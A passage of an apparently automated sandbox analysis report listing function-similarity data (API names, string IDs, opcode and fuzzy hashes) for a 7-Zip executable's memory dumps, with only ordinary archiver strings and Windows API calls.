                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearVariantmemsetstrlen
                              • String ID: Pzm
                              • API String ID: 1009013457-3550483149
                              • Opcode ID: 8864f3aac6f959e1ab29a61e8ba5e8cc0584cecd3a97f87daf6482e7cc123f0a
                              • Instruction ID: 79a92b5e57c3740e54640c52be379ee943255dbcc3392570b20a4d3e0001d43f
                              • Opcode Fuzzy Hash: 8864f3aac6f959e1ab29a61e8ba5e8cc0584cecd3a97f87daf6482e7cc123f0a
                              • Instruction Fuzzy Hash: C8D2E6B3609AC586CB70EB25E8512AEB761F7C6F90F444116DA8E87B18DF3CC855EB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$ErrorExceptionLastThrowfflushfputcmalloc
                              • String ID: : $ is not a file$----------$Archives$Can't allocate required memory$ERROR: $Listing archive: $Path$Total archives size$Volumes$opening :
                              • API String ID: 3292964186-2093788487
                              • Opcode ID: dcd182cc3e90315acf256ebf76f32233492c38784ec00441f68537fbd4c243e1
                              • Instruction ID: 634f7fdfdc9e2bb0736a6e2d13eee6e6817eafff0b1be2505f59c18ff934333f
                              • Opcode Fuzzy Hash: dcd182cc3e90315acf256ebf76f32233492c38784ec00441f68537fbd4c243e1
                              • Instruction Fuzzy Hash: 89C2C522609BC682DB70EB25E9517AEB361F7C5B90F844026DA8D47F29DF3CC595EB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$memmove$malloc
                              • String ID: Pzm
                              • API String ID: 273084669-3550483149
                              • Opcode ID: 05e4c3a31dbda257ab4ab99a1c73bbe938bffb6ad3fbaef4df3181674974808e
                              • Instruction ID: 7ac308fc1cb4fdaa0ec47cec12a193d52ea421e1bf9385cbaafa1404dd257c53
                              • Opcode Fuzzy Hash: 05e4c3a31dbda257ab4ab99a1c73bbe938bffb6ad3fbaef4df3181674974808e
                              • Instruction Fuzzy Hash: DEC27F72605B8582CB64EF25E8507AEB760FBC6F90F448512EA8E4BB15CF7DC845EB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrow
                              • String ID: There are unclosed input file:$bzip2$cannot open SFX module$cannot open file$update operations are not supported for this archive
                              • API String ID: 432778473-1171776569
                              • Opcode ID: 49ee7f5bc14479213eba1a65d206d5d6bc9ac5c870033aa7d1348e87376dea83
                              • Instruction ID: 662c24d9829d878e70825118b8c04f8f45ec86bd22f78e5fdf3a58b772c961f5
                              • Opcode Fuzzy Hash: 49ee7f5bc14479213eba1a65d206d5d6bc9ac5c870033aa7d1348e87376dea83
                              • Instruction Fuzzy Hash: 8B036F36709B8586CB64EF26E8942AEB764F7C5F90F588116DA8E47B18CF3CC855DB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$memset$ExceptionThrow
                              • String ID: Split
                              • API String ID: 2395193269-1882502421
                              • Opcode ID: 2493290eb5b3f8ee24db4eda8cd518f2314f742f85cb72dacdc63952338f8260
                              • Instruction ID: fdbd6b97e033a35dcd990db7ba9f26109d64f5d5d75124fd98e9afeeae07edb4
                              • Opcode Fuzzy Hash: 2493290eb5b3f8ee24db4eda8cd518f2314f742f85cb72dacdc63952338f8260
                              • Instruction Fuzzy Hash: 41729476609BC586CBA4EB26E85066F7760F7C6B84F505022EE4E4BB15CF3DC859DB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: Cannot open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                              • API String ID: 1534225298-1557438135
                              • Opcode ID: 32373e873a27a7a34b06568e3a1b51652a750d874ec9e573c91551283f754d21
                              • Instruction ID: a4a95a1ffc984a0bb1c82775b0a9114a81181a2aec086c2fdf1c38588c3eb963
                              • Opcode Fuzzy Hash: 32373e873a27a7a34b06568e3a1b51652a750d874ec9e573c91551283f754d21
                              • Instruction Fuzzy Hash: 04C15132204A8692CB60EB51EC917AEB372F7C1B90F504423EA8E47B64DF3DC955EB11
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: -----$-----BEGIN PGP SIGNED MESSAGE$Hash: $cksum
                              • API String ID: 1294909896-4104380264
                              • Opcode ID: 956a6dc816dc0f88712ccad567c0052a682e0abf729c03b5f6a23e86dca17487
                              • Instruction ID: 6bac415dddd2eb0aae01f968ec240fad23dbc023586b3956583884d48ca7a648
                              • Opcode Fuzzy Hash: 956a6dc816dc0f88712ccad567c0052a682e0abf729c03b5f6a23e86dca17487
                              • Instruction Fuzzy Hash: D802B6637096C582DBA0DB25E8903AE7761F7C6780F509022EB8E47B29DF3DC856E711
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: df26cbb64e52e9273ecb84fd93c97316ebf98eec34a8463178a40bc2d0f7f725
                              • Instruction ID: 88ba4676029387f14f97032cea9951b887ce29248c5aa0cc9a17f890756eb576
                              • Opcode Fuzzy Hash: df26cbb64e52e9273ecb84fd93c97316ebf98eec34a8463178a40bc2d0f7f725
                              • Instruction Fuzzy Hash: 68A2CE36719A8582EF24DF25E8507AEB361FBC5B98F444026DA4E47B28DF3DC949E700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Processfputs$AddressCurrentProc$HandleLibraryLoadModuleTimesmemset
                              • String ID: Cnt:$ Freq (cnt/ptime):$ MCycles$ MHz$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                              • API String ID: 2354542715-74044351
                              • Opcode ID: 08fd7e1f0e543b090c1fdc8a842d68e237c6065c0f3236f1413357f278ce83de
                              • Instruction ID: 91e67245ce1978681616c36830a15d5ab506c3080267810258d3aa2e490e6d8d
                              • Opcode Fuzzy Hash: 08fd7e1f0e543b090c1fdc8a842d68e237c6065c0f3236f1413357f278ce83de
                              • Instruction Fuzzy Hash: 1F614E61705A8782EE30DB56E955BBA7362FB88BD0F44403ADD4E87B64EE7CC449E700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$memset$strlen$memmove
                              • String ID: data:
                              • API String ID: 527563900-3222861102
                              • Opcode ID: 9a76d5dd416d0487b7c1d14dc4bcf4a788695f1eea2e26c5366d7eb632d94cc0
                              • Instruction ID: 4c61c9a34434bcbbbc90a15837af28d1324ad2c387d0cc5156633093ce18d365
                              • Opcode Fuzzy Hash: 9a76d5dd416d0487b7c1d14dc4bcf4a788695f1eea2e26c5366d7eb632d94cc0
                              • Instruction Fuzzy Hash: 661237336046C386DB60DF25E981BAEB761F790BD4F44902AEB8A47A55DF3CC945EB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 25136c1800815f7c234901d955ec7c49db965cce6217b761b30d1ac2caf1d6d5
                              • Instruction ID: 1b006099607836faa893b6cfe604317d5047d9acac67ef6b78764ca1644780e4
                              • Opcode Fuzzy Hash: 25136c1800815f7c234901d955ec7c49db965cce6217b761b30d1ac2caf1d6d5
                              • Instruction Fuzzy Hash: E0427E32705A8685EF25EF26E8507AAB361FBC5B84F548126DE4E47B18DF3DC849E700
                              APIs
                              Strings
                              • Duplicate filename on disk:, xrefs: 00FBF47E
                              • Duplicate filename in archive:, xrefs: 00FBFA11
                              • Internal file name collision (file on disk, file in archive):, xrefs: 00FBFA25
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$CompareFileTimemallocmemset
                              • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                              • API String ID: 1338569196-819937569
                              • Opcode ID: 2fc85414e7cab6a947b45a23e969bcc9298f246327c85903a986e9058c03029a
                              • Instruction ID: f797f45f17dabeda7e7032a72612dee6fe87bc0c90651ecedb7b43f2881c2e6c
                              • Opcode Fuzzy Hash: 2fc85414e7cab6a947b45a23e969bcc9298f246327c85903a986e9058c03029a
                              • Instruction Fuzzy Hash: A822B47761468486CB30DF2AE8502AEB7A1F3857A4F144226EB9E97B64DF3CD845DF00
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLast
                              • String ID:
                              • API String ID: 408039514-0
                              • Opcode ID: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                              • Instruction ID: 9957e2a7397745db4fa12df1edc7a9abe98302c02e9e37fa3a244375d2a54786
                              • Opcode Fuzzy Hash: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                              • Instruction Fuzzy Hash: 7751C822128A4592DB50FF24E85176EB720EBC57E0F809123FB8E43675DF6DC946EB12
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$DriveLogicalStrings
                              • String ID:
                              • API String ID: 837055893-0
                              • Opcode ID: 4cc479028ff7d879fdc195de33e9bcb2252e8f84ad214416d340dcefb7a8def0
                              • Instruction ID: 9fa6f8d625770444cfcd78efbd9052cfb52bb34e7ace874d703ac9f6bb50c248
                              • Opcode Fuzzy Hash: 4cc479028ff7d879fdc195de33e9bcb2252e8f84ad214416d340dcefb7a8def0
                              • Instruction Fuzzy Hash: 3D310363705B4156CB61EF22A85036E6351E784BE8F4CC226AE5E4B384EF7CC942A301
                              APIs
                              • free.MSVCRT ref: 00F7A745
                              • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 00F7A79C
                              • DeviceIoControl.KERNEL32 ref: 00F7A7E5
                              • free.MSVCRT ref: 00F7A7F2
                              • free.MSVCRT ref: 00F7A80F
                              • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 00F7A83D
                              • free.MSVCRT ref: 00F7A846
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ControlDeviceFileHandleInformationmemmove
                              • String ID:
                              • API String ID: 2572579059-0
                              • Opcode ID: 52e7afdefa4f23aef127d3b64a9db95593860de566cbb6a06265da25cc2ed072
                              • Instruction ID: b196709f1f82191baf03e38ff8d8422ac753579d883c47a1791c00df016739d5
                              • Opcode Fuzzy Hash: 52e7afdefa4f23aef127d3b64a9db95593860de566cbb6a06265da25cc2ed072
                              • Instruction Fuzzy Hash: 1D31A432605A4189C7709F11F84076EB764E3C1BE0F598226EBEE4BB94DE3DC492D702
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressDiskFreeHandleModuleProcSpace
                              • String ID: GetDiskFreeSpaceExW$kernel32.dll
                              • API String ID: 1197914913-1127948838
                              • Opcode ID: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                              • Instruction ID: 00620ef21c585439b7a8e0d0dd13f903f5bc4d45916ff198237b5a9b57fb82c7
                              • Opcode Fuzzy Hash: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                              • Instruction Fuzzy Hash: AE115C33616B4A95DA61CF55F480BAAB364F795B81F449022EB8D47B28EF38C559C700
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcVersion
                              • String ID: SetDefaultDllDirectories$kernel32.dll
                              • API String ID: 3310240892-2102062458
                              • Opcode ID: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                              • Instruction ID: 36cf8887adf129b89056a63d5ae6d258f0a0793381edd327fa6ef958ebd735c2
                              • Opcode Fuzzy Hash: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                              • Instruction Fuzzy Hash: E1E01724A86507C1FA28ABA5FC997382323AB94702FC4013BC40A06B60EF2C858AE301
                              APIs
                              • FileTimeToLocalFileTime.KERNEL32 ref: 00F7C220
                              • FileTimeToSystemTime.KERNEL32 ref: 00F7C234
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Time$File$LocalSystem
                              • String ID: gfff
                              • API String ID: 1748579591-1553575800
                              • Opcode ID: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                              • Instruction ID: 6d9d5a4a7339eaeae79f1cb8095904cd8c39690ef73516c8410facf261749968
                              • Opcode Fuzzy Hash: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                              • Instruction Fuzzy Hash: AB616753F086C04BE31ACB3D98667DE6FC1D3A5704F08C229DF9587B85E66C850AD762
                              APIs
                                • Part of subcall function 00F7C7B4: GetCurrentProcess.KERNEL32 ref: 00F7C7BE
                              • GetSystemInfo.KERNEL32 ref: 00F7C820
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CurrentInfoProcessSystem
                              • String ID:
                              • API String ID: 1098911721-0
                              • Opcode ID: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                              • Instruction ID: d84aae8253f62381ad1e1e16a176d7d009483409a4ad5322af25e4e194ec73bc
                              • Opcode Fuzzy Hash: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                              • Instruction Fuzzy Hash: 7AE0D8A3A2445083CB70DB08E841769B360F794B95FC0D21BE98E82F14DF2DC645DF82
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                              • Instruction ID: a1fbbcb9bcc7efee7b688c0ae804cdaa06d370458df0ffd6cbcb206c86ad0655
                              • Opcode Fuzzy Hash: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                              • Instruction Fuzzy Hash: CC4177A3B2097013EB2C9D1A9C24B745543B7C8B94F5AD239AE274F789E97D8C01D381
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                              • Instruction ID: 19e2a37985548ef290cb2f4b100a4fb18c0ea90ca722389ce595a07d089e609f
                              • Opcode Fuzzy Hash: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                              • Instruction Fuzzy Hash: 84311390AF14F0038B1C1AAECCB73B3200217902251FC842EB30385FC0DD1CC801260C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                              • Instruction ID: 0c1aa72de3fd69b90d94e583192a8cc5b6c099de0413a15664c381042be4dc76
                              • Opcode Fuzzy Hash: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                              • Instruction Fuzzy Hash: DF314D37760A0747D78CCA29DC73B7D32E1E389205F849A3EEA5ACA6C1E7388415C340
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
                              • Instruction ID: 5e52faa9fd702dda3fc015166fe922b50f0fa0ed30bbca94bd09a3a904d6698f
                              • Opcode Fuzzy Hash: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
